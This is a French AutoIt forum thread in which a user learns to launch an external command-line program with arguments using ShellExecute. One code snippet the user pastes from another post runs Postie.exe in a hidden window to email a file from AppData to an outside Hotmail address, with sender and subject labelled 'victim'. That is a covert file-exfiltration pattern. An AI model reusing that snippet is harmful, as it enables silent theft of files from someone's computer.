Bonjour.
Me revoici.
J'ai eu du mal à trouver un titre clair et représentatif. C'est peut-être aussi ce qui explique que je n'ai pas trouvé de réponse sur le forum ou sur celui anglais. Donc d'avance pardon, car je ne pense pas que ça n'ait jamais été posé.
Voici mon souci.
J'ai une commande dos, toto.exe.
Si je lance celle-ci, il ne se passe bien entendu rien du tout.
Il faut pour l'utiliser, passer par cmd, et dans la ligne de commande, taper "toto $path1 $path2" (sans le '.exe')
je cherche donc à automatiser cela à grande échelle, via autoit, mais j'avoue bloquer sur ce que j'ai pu lire ou tester jusqu'à présent.
Merci par avance.
[R] Commande DOS externe via CMD
Règles du forum
- Merci de consulter la section "Règles du forum" et plus particulièrement "Règles et Mentions Légales du site autoitscript.fr" avant d'écrire un message.
[R] Commande DOS externe via CMD
Modifié en dernier par TaPuZ le ven. 05 juin 2009 18:36, modifié 1 fois.
A bientôt,
T@PµZ.
- Niveau 11

- Status : Hors ligne
Re: [..] Commande DOS externe via CMD
essaye avec
Si je ne me trompe pas, $path1 $path2 doivent etre des parametre, et ShellExecute permet de lancer un .exe avec des param
Code : Tout sélectionner
ShellExecute("path\toto.exe",$path1&" "&$path2)Signez ici
Re: [..] Commande DOS externe via CMD
Je me suis encore noyé dans un verre d'eau!
Merci beaucoup!
Durant ce temps, j'ai comme par hasard retrouvé un autre post ( http://www.autoitscript.fr/forum/viewto ... &hilit=cmd) qui traite de cela où l'exemple est sensiblement le même (tenant compte des attributions possibles). Bref, ta réponse me solutionne mon problème. Je laisse aussi le lien, pour les nigauds de mon espèce...
Code : Tout sélectionner
$Postie = @ScriptDir & "\Postie.exe"
$Fichier = "C:\Users\NURZA\AppData\Local\TempObfuscator.txt"
$Param = '-host:smtp.wanadoo.fr -port:25 -to:terminatorn@hotmail.fr -from:victim@yopmail.com -s:VICTIM -file:"' & $Fichier & '" -msg:x'
ShellExecuteWait($Postie, $Param, "", "", @SW_HIDE)
tidam tidam tidam
A bientôt,
T@PµZ.
- Site Admin

Re: [R] Commande DOS externe via CMD
Vous avez aussi un petit tuto relativement complet ici : http://www.autoitscript.fr/forum/viewto ... =11&t=2931
Thierry
Rechercher sur le forum ----- Les règles du forum
Le "ça ne marche pas" est une conséquence commune découlant de beaucoup trop de raisons potentielles ...
Une idée ne peut pas appartenir à quelqu'un. (Albert Jacquard) tiré du documentaire "Copié n'est pas volé".
Le "ça ne marche pas" est une conséquence commune découlant de beaucoup trop de raisons potentielles ...
Une idée ne peut pas appartenir à quelqu'un. (Albert Jacquard) tiré du documentaire "Copié n'est pas volé".
Oui, merci. J'avais bien lu, mais il y avait marqué que surtout, c'était pour des commandes en interne, et non externes...
C'est pourquoi après avoir lu une bonne centaine de fois le topic, et tenté en vain des trucs, j'ai abandonné.
Ceci dit, pour moi, tout roule pour l'instant à ce niveau, et je me suis mis aussi aux commandes internes pour une autre partie.
En tous les cas, merci pour tout.
C'est pourquoi après avoir lu une bonne centaine de fois le topic, et tenté en vain des trucs, j'ai abandonné.
Ceci dit, pour moi, tout roule pour l'instant à ce niveau, et je me suis mis aussi aux commandes internes pour une autre partie.
En tous les cas, merci pour tout.
A bientôt,
T@PµZ.
- Site Admin

Heuu effectivement. J'ai lu votre message trop vite.
J'ai lu 'cmd' et 'commande DOS", mais pas compris que c'était une commande externe.
Ça m'apprendra à ne pas lire attentivement ...
J'ai lu 'cmd' et 'commande DOS", mais pas compris que c'était une commande externe.
Ça m'apprendra à ne pas lire attentivement ...
Thierry